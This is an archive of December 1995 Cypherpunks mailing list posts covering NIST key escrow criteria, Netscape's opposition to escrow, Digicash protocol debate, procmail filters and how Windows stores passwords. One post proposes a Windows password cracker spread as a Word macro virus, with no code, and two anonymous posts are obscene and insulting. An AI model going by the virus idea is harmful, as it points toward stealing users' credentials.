	+32 2 203 55 55 (Fax)

    InfoWarCon (Europe) - 96 Registration Form:

     Name:    ___________________________________________________________

     Title:   ___________________________________________________________
     
     Org:     ___________________________________________________________

     Address: ___________________________________________________________

     Address: ___________________________________________________________

     City:    ___________________________________________________________

     State:   _______________________________  Zip: _____________________

     Country: __________________________  Email: ________________________

     Phone:   __________________________  Fax:  _________________________


FEES:

        Payment made BEFORE March 1, 1996:    

                (   )  $845.00     NCSA Members/OSS Attendees
                (   )  $895.00     All others
                (   )  $795.00     3 people from same organization
                (   )  $745.00     5 or more people from same organization

        Payment made AFTER March 1, 1996:

                (   )  $895.00     NCSA Members/Paid OSS Attendees
                (   )  $995.00     All others
                (   )  $845.00     3 people from same organization
                (   )  $795.00     5 or more people from same organization

  Make checks payable to NCSA, or

     Charge to:  (  ) VISA      (  )   MasterCard       AMEX (  )

       Number:     ___________________________________________

       Exp date:   ___________________________

       Signature:  ___________________________________________


MAIL OR FAX OR EMAIL REGISTRATION TO:  

	National Computer Security Association
	10 South Courthouse Avenue
	Carlisle, PA 17013
	Phone 717-258-1816 or FAX 717-243-8642
	EMAIL:		conference@ncsa.com

To obtain the latest edition of this program, send EMail to:

	euroinfowar@ncsa.com

For more information about NCSA:

	WWW:	http://www.ncsa.com
	CompuServe:	GO NCSA
	EMail:		info@ncsa.com

Sponsorships for various InfoWarCon (Europe) 96 events are still available. To 
find out how to sponsor portions:

	Contact Paul Gates at the NCSA: pgates@ncsa.com

To reach: 	Winn Schwartau:  Winn@Infowar.Com
		Robert Steele: ceo@oss.net

V 1.1/12.7.95

Peace & Happy Holidays
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Dec 95 08:23:34 PST
To: cypherpunks@toad.com
Subject: Key Escrow Agent Criteria  [Draft]
Message-ID: <199512081619.RAA26774@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



[From NIST 12-08-95]


The following draft discussion paper was distributed at the  
12/5/95 meeting at NIST on draft criteria for 64-bit software 
key  escrow exportability.


                              DRAFT
                            (12/1/95)

                    Key Escrow Agent Criteria


Introduction


An often heard concern regarding key escrow encryption is that  
users of such encryption are vulnerable to abuse of the 
escrowed  key by the escrow agents or others.  Many have 
suggested that  changes in the law are needed that 
specifically, criminalize any  such abuses.  We agree that such 
laws will be beneficial in  deterring acts by anyone to access 
escrowed keys without  authority or to undermine the integrity 
of the escrow key system.


However, the availability of criminal prosecution is not alone  
sufficient.  Key escrow agents must be selected not only with a 
 view toward assuring the availability of escrowed keys for  
properly authorized government officials, but also to assure 
that  the escrow agents have the commitment and means to 
protect the  confidentiality and integrity of the keys they 
escrow and the  escrow system.  This will be particularly 
important if, as we  expect will occur, some key escrow 
products will be designed such  that the escrow agent could 
discern the identity of the user from  the keys and other 
information that is escrowed with them.


The following criteria were drafted with these principles in  
mind.  We have not yet addressed conditions under which users 
can  be the sole repository of the keys for their system.  We  
recognize that some organizations or people do not want anybody 
 but themselves to escrow their keys.  However, since an 
important  reason for escrowing is to preserve effective law 
enforcement, we  must assure authorized officials can reliably 
and timely obtain  access to escrowed keys through entities 
independent of the  subject of electronic surveillance.  Thus 
we welcome suggestions  on how best to meet this range of 
interests.


In considering the criteria appropriate for approving escrow  
agents, we considered whether the government needs to assure it 
 has timely and reliable access when authorized and what key  
escrow encryption users would want to ensure that the escrowing 
 of keys does not undermine their security.  Of course, the  
government is also a user of key escrow encryption products and 
 shares with other users an interest to ensure the integrity 
and  security of the escrow system.  Similarly, organizations  
interested in data recovery share the government's interest to  
have a system through which access to escrowed key is enabled  
under appropriate circumstances.  With these considerations in  
mind, we developed criteria in two categories, "Escrow System  
Integrity and Security" and "Key Access Requirements."  We 
expect  that prospective escrow agents that meet criteria such 
as these  would be considered as "approved" escrow agents for 
export  purposes, to hold keys for government systems, etc.


Note that keys and/or key components for devices that may 
process  classified information shall be escrowed with escrow 
agent  entities selected by the U.S. government, and that those 
escrow  agent entities may be required to meet more stringent  
requirements.


Escrow System Integrity and Security


1.   Escrow agent entities shall devise and institutionalize
     policies, procedures, and mechanisms to ensure the
     confidentiality, integrity, and availability of key escrow
     related information.


     a.   Escrow agent entities shall be designed and operated 
so
          that a failure by a single person, procedure, or
          mechanism does not compromise the confidentiality,
          integrity or availability of the key and/or key
          components (e.g., two person control of keys, split
          keys, etc.)


     b.   Unencrypted escrowed key and/or key components that 
are
          stored and/or transmitted electronically shall be
          protected (e.g., via encryption) using approved 
means.


     c.   Unencrypted escrowed key and/or key components stored
          and/or transferred via other media/methods shall be
          protected using approved means (e.g., safes).


2.   Escrow agent entities shall ensure due form of escrowed 
key
     access requests and authenticate the requests for escrowed
     key and/or key components.


3.   Escrow agent entities shall protect against disclosure of
     information regarding the identity of the person/
     organization whose key and/or key components is requested,
     and the fact that a key and/or key component was requested
     or provided.


4.   Escrow agent entities shall enter keys/key components into
     the escrowed key database immediately upon receipt.


5.   Escrow agent entities shall ensure at least two copies of
     any key and/or key component in independent locations to
     help ensure the availability of such key and/or key
     components due to unforeseen circumstances.


6.   Escrow agent entities that are certified by the U.S.
     government shall work with developers of key escrow
     encryption products and support a feature that allows
     products to verify to one another that the products' keys
     have been escrowed with a U.S.-certified agent.


Key Access Requirements


7.   An escrow agent entity shall employ one or more persons 
who
     possess a SECRET clearance for purposes of processing
     classified (e.g., FISA) requests to obtain keys and/or key
     components.


8.   Escrow agent entities shall protect against unauthorized
     disclosure of information regarding the identity of the
     organization requesting the key or key components.


9.   Escrow agent entities shall maintain data regarding all 
key
     escrow requests received, key escrow components released,
     database changes, system administration accesses, and 
dates
     of such events, for purposes of audit by appropriate
     government officials or others.


10.  Escrow agent entities shall maintain escrowed keys and/or
     key components for as long as such keys may be required to
     decrypt information relevant to a law enforcement
     investigation.


11.  Escrow agent entities shall provide key/key components to
     authenticated requests in a timely fashion and shall
     maintain a capability to respond more rapidly to emergency
     requirements for access.


12.  Escrow agent entities shall possess and maintain a
     Certificate of Good Standing from the State of 
incorporation
     (or similar local/national authority).


13.  Escrow agent entities shall provide to the U.S. government 
a
     Dun & Bradstreet/TRW number or similar credit report 
pointer
     and authorization.


14.  Escrow agent entities shall possess and maintain an Errors 
&
     Omissions insurance policy.


15.  Escrow agent entities shall provide to the U.S. government 
a
     written copy of, or a certification of the existence of a
     corporate security policy governing the key escrow agent
     entity's operation.


16.  Escrow agent entities shall provide to the U.S. government 
a
     certification that the escrow agent will comply with all
     applicable federal, state, and local laws concerning the
     provisions of escrow agent entity services.


17.  Escrow agent entities shall provide to the U.S. government 
a
     certification that the escrow agent entity will transfer 
to
     another approved escrow agent the escrow agent entity's
     equipment and data in the event of any dissolution or 
other
     cessation of escrow agent entity operations.


18.  Escrow agent entities for products sold in the U.S. shall
     not be a foreign country or entity thereof, a national of 
a
     foreign country, or a corporation of which an alien is an
     officer or more than one-fourth of the stock which is 
owned
     by aliens or which is directly or indirectly controlled by
     such a corporation.  Foreign escrow agent entities for
     products exported from the U.S. will be approved on a case
     by case basis as law enforcement and national security
     agreements can be negotiated.


19.  Escrow agent entities shall provide to the U.S. government 
a
     certification that the escrow agent entity will notify the
     U.S. government in writing of any changes in the forgoing
     information.


20.  Fulfillment of these and the other criteria are subject to
     periodic recertification.


12/1/95

*****************************************************  

Elaine Frye
Computer Security Division
National Institute of Standards and Technology  Bldg. 820, M.S. 
Room 426
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1233

*****************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 8 Dec 95 15:16:43 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
Message-ID: <Pine.ULT.3.91.951208171853.19620A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?

I sort mine using the "sender:" tag.  Works like a charm.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMMir1TokqlyVGmCFAQGcngQAwbu8k2KPb21zxoNIoMwrcByaSGpl1pk1
JxdSaTq+JYWgIzJEVYbnP41ftV08XyPcovQdQe+2GF/pjVBFlV4ZE/QmVx5JtoWr
gu8otJkGvN1MLLJA1isSBqkFr5HCLtcRJXRv5Xl0qLz7narhbbwfoxYUHTX3obC9
wN/u4wxPKpE=
=k1z1
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Fri, 8 Dec 95 14:18:35 PST
Subject: CP: Mailing List Subjects
In-Reply-To: <acedea6511021004dea8@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Would it be possible for the Cypherpunks mailing list remailer to parse the 
Subject line to include a CP: at the beginning, or some notation so that 
Cypherpunk messages can be easily 'filtered' out from my Inbox?

Also, about Microsoft's .PWL file format. Will they be releasing the 
new encryption method? Or are we not supposed to feel safe that our 
passwords are protected in Windows95.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nicholas Philp <lumisign@c031.aone.net.au>
Date: Thu, 7 Dec 95 23:26:38 PST
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199512080727.SAA19878@mail.mel.aone.net.au>
MIME-Version: 1.0
Content-Type: text/plain


WE WANT SOME PUSSY PICTURES







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Dec 95 19:08:51 PST
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <9512082354.AA02244@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


David A Wagner writes:
> >Tough!?  It's trivial for an active attacker, in the stream cipher case.
> >He just xors some bits: no clever cryptanalysis needed.  (Or did you mean
> >it's tough to mount an active attack?  I agree: that requires significant
> >knowledge or motivation.)
Rev. Mark Grant responds:
>  Exactly.. once you have an active attack set up, it's trivial, but
>  setting that up is quite hard.

But setting up an active attack is probably a hell of a lot easier than  
breaking 128-bit RC-4 (or even 64-bit).

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Fri, 8 Dec 95 09:08:55 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512081710.SAA28344@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> WE WANT SOME PUSSY PICTURES

Can't help you there but, I do have some pictures of your mother
having sex with a dog because she didn't want you to be an only child.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 8 Dec 95 19:25:22 PST
To: cypherpunks@toad.com
Subject: SpeakFree (Internet real-time voice w/encryption?)
Message-ID: <199512090325.TAA11218@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody seen, used or hacked with SpeakFree?

Supposedly it's a kind of internet-phone that has IDEA/DES encryption options, plus another option to exchange encryption keys with PGP...

The URL is http://www.fourmilab.ch/speakfree/windows/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 8 Dec 95 19:50:37 PST
To: cypherpunks@toad.com
Subject: Windows .PWL cracker implemented as a Word Basic virus?
Message-ID: <199512090351.TAA29699@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Just an idea. It would be huge, but can anyone think of a reason it would not
be technically feasible?

Also, does NT use the same algorithm for saving network passwords?

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 9 Dec 95 20:45:16 PST
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
Message-ID: <199512100446.UAA00146@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
>Credit where credit is due.
>
>I for one am satisfied--and even pleased--with the Netscape position on GAK.

Well I for one, am serious unsatisfied, but it is not so bad as
to merit a campaign against Netscape.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 8 Dec 95 22:15:44 PST
To: cypherpunks@toad.com
Subject: NT v. Win95 Passwords (was Re: Windows .PWL cracker implemented as a Word Basic virus)
In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net>
Message-ID: <Pine.ULT.3.91.951208220127.28627P@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995, Dan Bailey wrote:

> On Fri, 8 Dec 1995 19:51:55 -0800 you wrote:
> 
> >
> >Also, does NT use the same algorithm for saving network passwords?
> >
> No, but they're doing something that makes me very uncomfortable:  As
> I read this, they're hashing the password and some other user
> information using MD4 then doing some proprietary permutations on
> that.  Given their record with security, I'd rather they used straight
> MD4, rather than throwing in something that we can't analyze.
> 						Dan Bailey
> 
> >From the Microsoft Knowledge Base article Q102716

That would be http://www.microsoft.com/kb/bussys/winnt/q102716.htm. Seems
reasonable to me. It's good enough for NT to get the guvment's imprimatur
for the guvment's own use. 

Does anyone have any technical information on the problem referred to in
http://www.microsoft.com/KB/PEROPSYS/windows/Q131675.htm (below)? It says 
"The password encryption method used by Windows NT is different from
the method used by Windows 95," and offers some curious workarounds.
Microsoft has not been very cooperative. 

In other news (just to combine four subjects in one message), in our
meeting with Microsoft today on DHCP issues (that's in the gopher archive;
finger me), a Highly Placed Source said that Microsoft would release the
details on the new Win95 .PWL encryption Soon, and that a release
candidate is in internal beta testing now, but that there would be no
outside testing prior to the public release. 

Q131675

SYMPTOMS

You may not be able to connect to a shared folder on a Windows 95 computer
from a Microsoft Windows NT workstation.


CAUSE

The password encryption method used by Windows NT is different from
the method used by Windows 95.


RESOLUTION

You may be able to work around this problem by using one of the following
methods:

 - Use all uppercase or all lowercase characters in the Windows 95
   shared folder password.

 - Remove password protection from the shared folder.

 - Use user-level access control instead of share-level access control.


STATUS

Microsoft is researching this problem and will post new information
here in the Microsoft Knowledge Base as it becomes available.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 8 Dec 95 22:43:21 PST
To: cypherpunks@toad.com
Subject: Re: CP: Mailing List Subjects
Message-ID: <199512090643.WAA26800@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Michael Handler wrote:

> Learn procmail. It'll save you hours upon hours of time.
>
> :0:
> * (^From owner-cypherpunks@toad\.com|^Sender: owner-cypherpunks@toad\.com)
> lists/cypherpunks

Would the following work??

 :0
 * (^From|^Sender).*owner-cypherpunks@toad.com
 |/usr/bin/contrib/procmail -m ~/.punk_rc 

Does anyone know where the procmail archives are??  

That might help some of us out, especially those of use who are lousy at
managing our very, very precious resources. 



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 8 Dec 95 22:50:54 PST
To: <cypherpunks@toad.com>
Subject: [FYI] Corp.Spooks Outed + W3 Proxy Filters
Message-ID: <v03004002aceedf15cdfc@[129.46.82.86]>
MIME-Version: 1.0
Content-Type: text/plain


PRIVACY INTERNATIONAL's BIG BROTHER INCORPORATED. A Report on the Int'l
Trade in Surveillance Technology and its Links to the Arms Industry.
<http://www.privacy.org/pi/reports/big_bro/>

"WebFilter" (formerly "NoShit")
<http://emile.math.ucsb.edu:8000/~boldt/NoShit/index.html>
<http://pubs.iworld.com/ww-online/Nov95/news/noshit.html>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Fri, 8 Dec 95 19:53:48 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
Message-ID: <Pine.SUN.3.91.951208225309.7396J-100000@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?

Um, it already does.

Learn procmail. It'll save you hours upon hours of time.

:0:
* (^From owner-cypherpunks@toad\.com|^Sender: owner-cypherpunks@toad\.com)
lists/cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Fri, 8 Dec 95 23:06:23 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <m0tOJNm-000V7OC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Again, you seem fixated on making Clark's opinions equivelent to the
> position of Netscape Communications Corp, this is not a reasonable
> assumption.

  Given Clark's position, I believe it is a reasonable assumption.  
Unless of course you hold that the Corp. as a legal entity could have 
a seperate position. In that case then WHO speaks for the 
corporation?  Some lower level PR person?  I don't think so...<s>. 
Tim Cook, Mindsource(tm) Librarian.
"The World is a Database - Mindsource is the Search Engine."
______________________________________________________________
M I N D S O U R C E (TM) I N F O R M A T I O N   N E T W O R K 
Send a blank Email to:mindsource@memo.net for full information
Visit our W3 Site http://www.ultimate.org/mindsource/main.html 
D E S T I N E D   FOR   G L O B A L   D I S T R I B U T I O N!  
Concept:"The Greatest Untapped Resource is Human Resource(TM)" 
Mindsource is a Reg. Trademark  Copyright(c)1995 by Mindsource





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Sat, 9 Dec 95 00:22:55 PST
To: cypherpunks@toad.com
Subject: More elveator problem
Message-ID: <199512090823.AAA15124@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


More on The Elevator Problem:

I'll confess that we're working on a new private key encryption product. Free 
and clear of existing claims on intellectual property, I'd like a protocol 
that answers the elevator problem: how can Alice and Bob agree on a private 
key via a compromised channel? I don't want them to meet under a street lamp 
and whisper in each other's ears _before_ trying to establish a secret on a 
crowded elevator.

I'm willing to accept that the basic question is undoable without stepping on 
DH et al., I just don't want to give up until all parties are convinced it 
can't be done.

As I stated in my original post, we're willing to consider less-than-perfect 
implimentations if we can quantify mathematically the risk involved. In some 
scenarios, Alice and Bob might not expect any Eve's in the crowded elevator 
or value the content at such a price that they're willing to live with less 
than 100%. As long as we can document the risk, the end user can make the 
decision as to whether the risk is worth it.

Something that I neglected to mention before is that Alice and Bob do have a 
unique ID within this system, not that they necessarily know each others. If 
one assumes that they do, they then share a secret: the knowledge of each 
other's unique ID.

Another segment of our attention is being spent daydreaming about the 
potential applications of a secondary channel in the cleartext portion of a 
crypto "package" or "bundle".  The comment about secondary channels that I 
believe Tim made regarding the inmates and the warden is something we discuss 
in our spare time.

Then again the wheels of justice doth turn and patents ain't forever...


Jerry Whiting
jwhiting@azalea.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Sat, 9 Dec 95 02:19:58 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <m0tOMPB-000Uz9C@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


> he is speaking for Jim Clark.  It is possible to not believe in
> something ethically, yet see a financial advantage in supporting it.
>  Their is a distinction that must be made, though admitedly the line
> does become fuzzy when a senior person makes a statement, this is
> because he is often the one driving the policy.
> 
I think you've made our point. <g>
He has to make that distinction at the time he says it, or most of us 
will ASS-U-ME it's company policy as well. Especially when the 
statement deals so directly with the company's product.

Tim Cook, Mindsource(tm) Librarian.
"The World is a Database - Mindsource is the Search Engine."
______________________________________________________________
M I N D S O U R C E (TM) I N F O R M A T I O N   N E T W O R K 
Send a blank Email to:mindsource@memo.net for full information
Visit our W3 Site http://www.ultimate.org/mindsource/main.html 
D E S T I N E D   FOR   G L O B A L   D I S T R I B U T I O N!  
Concept:"The Greatest Untapped Resource is Human Resource(TM)" 
Mindsource is a Reg. Trademark  Copyright(c)1995 by Mindsource





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Fri, 8 Dec 95 21:46:21 PST
To: llurch@networking.stanford.edu
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
Message-ID: <199512090547.FAA21624@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995 19:51:55 -0800 you wrote:

>
>Also, does NT use the same algorithm for saving network passwords?
>
No, but they're doing something that makes me very uncomfortable:  As
I read this, they're hashing the password and some other user
information using MD4 then doing some proprietary permutations on
that.  Given their record with security, I'd rather they used straight
MD4, rather than throwing in something that we can't analyze.
						Dan Bailey

From the Microsoft Knowledge Base article Q102716

Storage of the Passwords in the SAM Database
--------------------------------------------
 
User records are stored in the security accounts manager (SAM)
database. Each user has two passwords with which it is associated: the
LAN Manager compatible password and the Windows NT password. Each
password is stored doubly encrypted in the SAM database. The first
encryption is a one-way function (OWF) version of the clear text
generally considered to be non-decryptable. The second encryption is
an encryption of the user's relative ID (RID). The second encryption
is decryptable by anyone who has access to the double-encrypted
password, the user's RID, and the algorithm. The second encryption is
used for obfuscation purposes.
[snip]
The Windows NT password is based on the Unicode character set, is case
sensitive, and can be up to 128 characters long. The OWF version
(called the Windows NT OWF password) is computed using the RSA MD-4
encryption algorithm, which computes a 16-byte "digest" of a variable
length string of clear text password bytes.
 
 

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 22:14:54 PST
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Escrow expectations
In-Reply-To: <199512081417.JAA03121@homeport.org>
Message-ID: <Pine.SUN.3.91.951209011540.26292A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Adam Shostack wrote:

> 
> 	If there is no expectation of privacy when a key is escrowed
> with Bob, or my companies attorneys, then would there be any
> expectation of privacy under Clipper?  Perhaps this is a powerful
> argument we should expect to have used against us...
> 
> 	"Your honor, we argue that in escrowing his keys with the US
> government, the defendant should have known his communications could
> be listened to, and thus has no expectation of privacy."

Uh, this was the entire point of that thread "is a lawyer in the house" yes.

> 
> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 9 Dec 95 01:20:12 PST
To: cypherpunks@toad.com
Subject: Netscape announces position against GAK
Message-ID: <30C953EC.28BA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


I've included below the official Netscape position against GAK.
This page is now available on our web site at the URL below.
I'm sorry that we were not able to get this out earlier in the
week, but we ran into some delays due to travel schedules (people
attending the NIST meeting), and some logistical problems due to large
changes on our web site.

  There is a link to this document on our home page,
http://home.netscape.com/, which gets accessed more than 1 million
times per day.

  I would appreciate it if people who forwarded parts of the
recent Netscape/GAK discussion to other forums would at least
send them the URL for this page.

	--Jeff

http://home.netscape.com/newsref/ref/encryption_export.html

>   NETSCAPE PRESENTS POLICY ON ENCRYPTION EXPORT TO KEY MEMBERS OF THE
>                      ADMINISTRATION AND CONGRESS
> 
> ----------------------------------------------------------------------
> 
> This week Netscape representatives attending a government presentation
> of the administration's proposed Key Escrow Policy for Export detailed
> the company's firm opposition to the proposed policy. Netscape is
> opposed to this type of proposal for a number of reasons including its
> failure to adequately address the issues of acceptability by foreign
> governments and corporations, significant personal privacy concerns,
> and the mandatory nature of tying the Exportable Key Size to the Key
> Escrow Proposal.
> 
> At present the proposed Key Escrow Policy for Export states that a
> U.S. Government-approved key escrow process must be used by U.S.
> software manufacturers if they wish to export commodity encryption
> products of a key length up to 64 bits. Currently, Netscape can only
> provide its non-U.S. customers with products containing a 40-bit key.
> It has been Netscape's experience that non-U.S. customers demand
> products as cryptographically strong as those that are available to
> U.S. customers (i.e., at least 128-bit key length). Hence, the current
> U.S. Government proposal is compelling software companies like
> Netscape to manufacture two different versions of its products - an
> inefficient and noncompetitive posture that does not meet the needs of
> the foreign markets.
> 
> Netscape believes that this division in the global marketplace is not
> compatible with the nature, structure, and history of the Internet and
> its users. In addition, the 64-bit key length size in the U.S.
> Government proposal is inadequate for security purposes; recent
> experience in the United States and other countries demonstrates that
> a 64-bit key can be compromised. Therefore, Netscape believes that the
> U.S. Government's proposal does not support the needs of industry.
> 
> In particular:
> 
>   1. The U.S. Government proposal imposes regulations that will not
>      scale up to the speed at which the information
>      technology/Internet software industry continues to develop. The
>      proposed process represents a regulatory burden that is not
>      consistent with the decentralized and agile nature of the
>      IT/Internet business. The proposal puts at risk significant
>      economic stability not just for U.S.-based IT firms but for the
>      U.S. economy as a whole as every sector's growth is fueled by the
>      increasing availability and innovative use of information
>      products and services.
> 
>   2. The U.S. Government proposal would in effect result in the
>      mandatory use of these export-grade products within the United
>      States. The proposal includes a non-interoperability criteria
>      that would make it impossible for a non-escrowed software product
>      to talk to an escrowed software product. Thus, consumers inside
>      the United States would be forced to use a government-approved
>      key-escrow product if they value the ability to communicate with
>      others outside the United States.
> 
>   3. Corporate and individual rights to privacy are placed in question
>      by the current U.S. Government escrow proposal and process. This
>      is so because of the mandatory nature of the proposal resulting
>      from the key escrow requirement itself and the oversight role
>      government proposes to play in the accreditation process and
>      business practices of an escrow agent.
> 
> Netscape will continue to work with industry organizations, partners,
> and customers who are in similar opposition to the government's
> proposal to ensure that the current administration understands the
> unacceptability of this plan.
> 
> ----------------------------------------------------------------------
> 
>       Find out more about Netscape at info@netscape.com, or call
>                              415/528-2555.
>          Copyright (c) 1995 Netscape Communications Corporation

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 8 Dec 95 23:37:36 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Still more on the Digicash protocol
In-Reply-To: <199512082234.OAA02297@ix9.ix.netcom.com>
Message-ID: <199512090738.CAA09330@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark Twain Bank Ecash Support writes:
> DigiCash agrees that it is desirable to encrypt the payment request. The
> problem is how? You can't use the payor's public key, since the payor is
> anonymous to the payee. 

Bill Stewart writes:
# Obviously if the payer is the one transmitting the message, she doesn't
# use her public key to encrypt; hers would be used for signature if 
# appropriate.
# She should use the payee's public key, 
[...]

But the payment request is sent from the shop (payee) to the customer (payor).

-Futplex <futplex@pseudonym.com>
"Women need a reason to have sex; men just need a place" -from a fitness mag.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Fri, 8 Dec 95 19:04:14 PST
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Netscape speaks with a forked tongue:
In-Reply-To: <199512090118.RAA10458@blob.best.net>
Message-ID: <30c8fb21.576667@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 08 Dec 1995 01:13:51 GMT James a Donald <jamesd@echeque.com>
wrote:

>Netscape speaks with a forked tongue:
>
